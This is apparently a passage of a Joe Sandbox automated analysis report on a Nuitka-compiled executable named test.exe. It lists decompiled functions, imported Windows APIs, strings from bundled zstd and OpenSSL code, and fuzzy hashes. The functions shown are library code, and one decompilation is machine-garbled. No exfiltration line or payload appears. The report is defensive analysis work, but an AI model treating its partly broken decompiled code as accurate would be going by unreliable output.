Instruction Fuzzy Hash: 5921B3F3B11A8986D708CF25E84475D77A5F348BC8F58812AEF496B394DB78C9A4C344

Uniqueness

Uniqueness Score: -1.00%

Function 004017BB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00401844

Strings

C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h, xrefs: 00401836
nbBits < BIT_MASK_SIZE, xrefs: 0040183D

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: _assert
String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$nbBits < BIT_MASK_SIZE
API String ID: 1222420520-2490357055
Opcode ID: fcddad1668c469c0cf82814d307a856b0abfafb698f75271dc40d66abe7eb004
Instruction ID: 04b1a0a5ac88d5d4788d1db48f5f0ceafe11a15e36386693d9c0afb0c6541c39
Opcode Fuzzy Hash: fcddad1668c469c0cf82814d307a856b0abfafb698f75271dc40d66abe7eb004
Instruction Fuzzy Hash: A901F567701594A6E7118F2AEC4075EBB60F308F9CF4D8012EF4957390DA34C995D344

Uniqueness

Uniqueness Score: -1.00%

Function 00401860 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 004018A4

Strings

C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h, xrefs: 00401896
nbBits >= 1, xrefs: 0040189D

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: _assert
String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$nbBits >= 1
API String ID: 1222420520-1700488978
Opcode ID: 6ec9baf6aa0af4de1258b8e31fde25364cc199c8d2396736d310e6694e74d174
Instruction ID: 50306d61f4c3f28cd9f706f24cdb7d8ec1b790f10d4dfbaf4cb51d9dfcc1ea09
Opcode Fuzzy Hash: 6ec9baf6aa0af4de1258b8e31fde25364cc199c8d2396736d310e6694e74d174
Instruction Fuzzy Hash: 3CE0867270551993DF18AB17F8917592322A394350F88C4359F4E137A0CE38C959C744

Uniqueness

Uniqueness Score: -1.00%

Function 00402B6E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00402B6E(void* __ebx, signed int __rdi, signed long long __r13, void* __r15) {
				signed int _t31;
				signed short _t33;
				signed int _t34;
				short _t37;
				void* _t49;
				signed short* _t55;
				short* _t68;
				signed long long _t69;
				void* _t73;
				short* _t75;
				signed long long _t77;
				void* _t81;

				_t81 = __r15;
				_t77 = __r13;
				r8d = 0x1c7;
				dil = dil + dil;
				asm("adc eax, 0x3d908");
				_t75 = _t68;
				 *((long long*)(_t73 + 0x20)) = __imp___assert;
				_t49 =  *((intOrPtr*)(_t73 + 0x90)) + 0x10 + __rdi * 8;
				goto L2;
				do {
					do {
						L2:
						r13d =  *((intOrPtr*)(_t75 + 4));
						_t55 = _t81 + _t77 * 2;
						_t69 =  *_t55 & 0x0000ffff;
						 *_t55 = _t33;
						if(_t69 == 0) {
							r8d = 0x8e;
							__imp___assert();
						}
						asm("bsr ecx, ebp");
						asm("invalid");
						asm("loop 0x6b");
						_t34 = _t31 * _t69 >> 0x20;
						_t31 = _t31 * _t69;
						 *(_t75 + 3) = _t34;
						 *_t75 = _t37;
						if( *((intOrPtr*)( *((intOrPtr*)(_t73 + 0xb0)) + _t77 * 4)) > 0xfe) {
							goto L6;
						} else {
							goto L4;
						}
						goto L5;
						L6:
						_t75 = _t75 + 8;
						r8d = 0x1e0;
						_t31 =  *((long long*)( *((intOrPtr*)(_t73 + 0x20))))();
						 *(_t75 - 6) = _t34;
						 *((intOrPtr*)(_t75 - 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t73 + 0xa8)) + _t77 * 4));
					} while (_t75 != _t49);
					break;
					L4:
					 *(_t75 + 2) = _t34;
					_t75 = _t75 + 8;
					 *((intOrPtr*)(_t75 - 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t73 + 0xa8)) + _t77 * 4));
				} while (_t49 != _t75);
				L5:
				return _t31;
			}

0x00402b6e
0x00402b6e
0x00402b6e
0x00402b81
0x00402b83
0x004028ba
0x004028d5
0x004028dc
0x004028df
0x004028e8
0x004028e8
0x004028e8
0x004028e8
0x004028ed
0x004028f1
0x004028f7
0x004028fc
0x004029d9
0x004029e9
0x004029e9
0x00402902
0x00402911
0x00402912
0x00402914
0x00402914
0x00402918
0x0040291d
0x0040292f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402993
0x0040299f
0x004029a3
0x004029b0
0x004029bd
0x004029c6
0x004029cb
0x00000000
0x00402931
0x00402939
0x0040293e
0x00402946
0x0040294b
0x00402950
0x00402960

APIs

_assert.MSVCRT ref: 00402B82

Strings

position == 0, xrefs: 00402B7B
C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c, xrefs: 00402B74

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: _assert
String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c$position == 0
API String ID: 1222420520-364413042
Opcode ID: 577e3e5f29719710d16149a4ba94b5016d57a63fcf6c80e3acaccf5e858ac52b
Instruction ID: 035be0b90b44c1e5ca049ae90ea0c9a46175ee5ee0a0a1431348f0537739eea1
Opcode Fuzzy Hash: 577e3e5f29719710d16149a4ba94b5016d57a63fcf6c80e3acaccf5e858ac52b
Instruction Fuzzy Hash: DFC092E430A912E1FA00DB11E954B982320A750B44FD1802AA70E414F4AFBDC60DC70C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: test.exePID: 6860, Parent PID: 6828COMMON

Execution Graph

Execution Coverage:	0.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	2

Executed Functions

Function 00557B50 Relevance: 9.0, APIs: 6, Instructions: 46
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 00557B8D
OpenProcess.KERNEL32 ref: 00557B9D
WaitForSingleObject.KERNEL32 ref: 00557BAC
FindCloseChangeNotification.KERNEL32 ref: 00557BB4
PyErr_SetInterrupt.PYTHON39 ref: 00557BBA
GetLastError.KERNEL32 ref: 00557BD8

Memory Dump Source

Source File: 00000001.00000002.230004889.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.229996529.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.230055852.00000000005C2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.230063601.00000000005D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.230071551.00000000005DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.230078177.00000000005EC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.230078177.00000000005F8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.230091214.00000000005FA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_test.jbxd

Yara matches

Similarity

API ID: ChangeCloseErr_ErrorFindInterruptLastNotificationObjectOpenProcessSingleSleepWait
String ID:
API String ID: 842494446-0
Opcode ID: fe6d0efd7a0be18a5374f77652df3073de4164e97283ae3b725b09f4b5d67a66
Instruction ID: 0c99bc4e85985314e867aa14fc9a7f2eb5f8cf3cf666d9d3530af785429f4ade
Opcode Fuzzy Hash: fe6d0efd7a0be18a5374f77652df3073de4164e97283ae3b725b09f4b5d67a66
Instruction Fuzzy Hash: EA01AF25B11E46D5EA159BA7BC10B371A95BB8DBE7F494032DE1C43350EE3CC886C710

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFD3FBE3229 Relevance: 21.3, APIs: 14, Instructions: 251fileCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFD3FD83F3E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFD3FD83F8E
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFD3FD83F9C
memset.VCRUNTIME140 ref: 00007FFD3FD83FB8
MultiByteToWideChar.KERNEL32 ref: 00007FFD3FD83FDF
GetLastError.KERNEL32 ref: 00007FFD3FD83FEC
MultiByteToWideChar.KERNEL32 ref: 00007FFD3FD84013
MultiByteToWideChar.KERNEL32 ref: 00007FFD3FD84068
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFD3FD84079
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFD3FD84082
FindFirstFileW.KERNEL32 ref: 00007FFD3FD841EC
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFD3FD8420E
FindNextFileW.KERNEL32 ref: 00007FFD3FD84229
WideCharToMultiByte.KERNEL32 ref: 00007FFD3FD84287

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: ByteCharMultiWide_errno$FileFind$ErrorFirstLastNextfreemallocmemset
String ID:
API String ID: 3372420414-0
Opcode ID: 5c753f6ee10f5d401d3a973a1d8301d71a9dd3c075b512ff88a6f757cec8f98e
Instruction ID: dc931f34dada93bae943df16885b375699c41fa0d4b9d81008c95cc65b2e24da
Opcode Fuzzy Hash: 5c753f6ee10f5d401d3a973a1d8301d71a9dd3c075b512ff88a6f757cec8f98e
Instruction Fuzzy Hash: FBB11562B08A8685EB188F25E8686797BA0FF59BA4F484731DB6D037D0EF3DE0459340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE266C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 168COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FFD3FDADC61
GetEnvironmentVariableW.KERNEL32 ref: 00007FFD3FDADC82
GetEnvironmentVariableW.KERNEL32 ref: 00007FFD3FDADC9D
GetEnvironmentVariableW.KERNEL32 ref: 00007FFD3FDADCB8
GetEnvironmentVariableW.KERNEL32 ref: 00007FFD3FDADD00
WideCharToMultiByte.KERNEL32 ref: 00007FFD3FDADD36
WideCharToMultiByte.KERNEL32 ref: 00007FFD3FDADD8B

Strings

HOME, xrefs: 00007FFD3FDADC70
.rnd, xrefs: 00007FFD3FDADE3A
USERPROFILE, xrefs: 00007FFD3FDADC8E
RANDFILE, xrefs: 00007FFD3FDADC49
SYSTEMROOT, xrefs: 00007FFD3FDADCA9

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: EnvironmentVariable$ByteCharMultiWide
String ID: .rnd$HOME$RANDFILE$SYSTEMROOT$USERPROFILE
API String ID: 2184640988-1666712896
Opcode ID: 94a3f27f441c069f02bf03fdac3435e2be26af5a1126ddad85516de43e4ab70a
Instruction ID: f3b2b23f387a46e4829f6c578e815338dd02b7ff32691be0f381d938ecf791b3
Opcode Fuzzy Hash: 94a3f27f441c069f02bf03fdac3435e2be26af5a1126ddad85516de43e4ab70a
Instruction Fuzzy Hash: F761E322B08B8695EB58CF21A46017967A1FB59BE4B488331DF6D437D8DF3EE105E300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE5A1F Relevance: 13.6, APIs: 9, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFD3FE25BD0
memset.VCRUNTIME140 ref: 00007FFD3FE25BF4
RtlCaptureContext.KERNEL32 ref: 00007FFD3FE25BFD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFD3FE25C17
RtlVirtualUnwind.KERNEL32 ref: 00007FFD3FE25C58
memset.VCRUNTIME140 ref: 00007FFD3FE25C8B
IsDebuggerPresent.KERNEL32 ref: 00007FFD3FE25CAC
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFD3FE25CCD
UnhandledExceptionFilter.KERNEL32 ref: 00007FFD3FE25CD8

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: ce35e6337236f3c81091592d9187cbdc35141420fbd4c5511d86306e2d3c8c38
Instruction ID: 65425b828e2fc1675746f37939820d40e660f106bd68d24aa44ab5b4e75d7187
Opcode Fuzzy Hash: ce35e6337236f3c81091592d9187cbdc35141420fbd4c5511d86306e2d3c8c38
Instruction Fuzzy Hash: B0315CB6709B859AEB649F60E8503ED3360FB84788F44413ADB8E57B98EF38D548D710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE22E8 Relevance: 6.4, APIs: 5, Instructions: 140COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FFD3FD837AB
memset.VCRUNTIME140 ref: 00007FFD3FD837C2
memmove.VCRUNTIME140 ref: 00007FFD3FD837E9
memset.VCRUNTIME140 ref: 00007FFD3FD837F6
memmove.VCRUNTIME140 ref: 00007FFD3FD8382A

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: memmove$memset
String ID:
API String ID: 3790616698-0
Opcode ID: 7bd3081549f37e99082b2e2184b592387e8504f8a293854baa3812126ce6fff8
Instruction ID: ef228217251fa738fd2fdc68da1d979ef389dc1a69dbe499d5f87608ff27f064
Opcode Fuzzy Hash: 7bd3081549f37e99082b2e2184b592387e8504f8a293854baa3812126ce6fff8
Instruction Fuzzy Hash: CE51E022B1D78986DA109B16F85026EBBA0FB89BD4F484135EF9D07B95CE3CE501D740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE2B5D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57networkCOMMON

Download Yara Rule

APIs

bind.WS2_32 ref: 00007FFD3FCAA639
WSAGetLastError.WS2_32 ref: 00007FFD3FCAA648

Strings

..\s\crypto\bio\b_sock2.c, xrefs: 00007FFD3FCAA5EE, 00007FFD3FCAA65E, 00007FFD3FCAA67A

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: ErrorLastbind
String ID: ..\s\crypto\bio\b_sock2.c
API String ID: 2328862993-3200932406
Opcode ID: 6030828c8e1e392444e633d6f91595f56864d96a03ab1f3b7ff65bab8f1c30fa
Instruction ID: 30c56119b40f581610f269746c31011502d75ef32152aae7b22b15237a8ead8a
Opcode Fuzzy Hash: 6030828c8e1e392444e633d6f91595f56864d96a03ab1f3b7ff65bab8f1c30fa
Instruction Fuzzy Hash: 93210F72B0824A82E754DB22F8246AD7360FB90B84F440231EB5C43BDADF3DE546EB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE4241 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

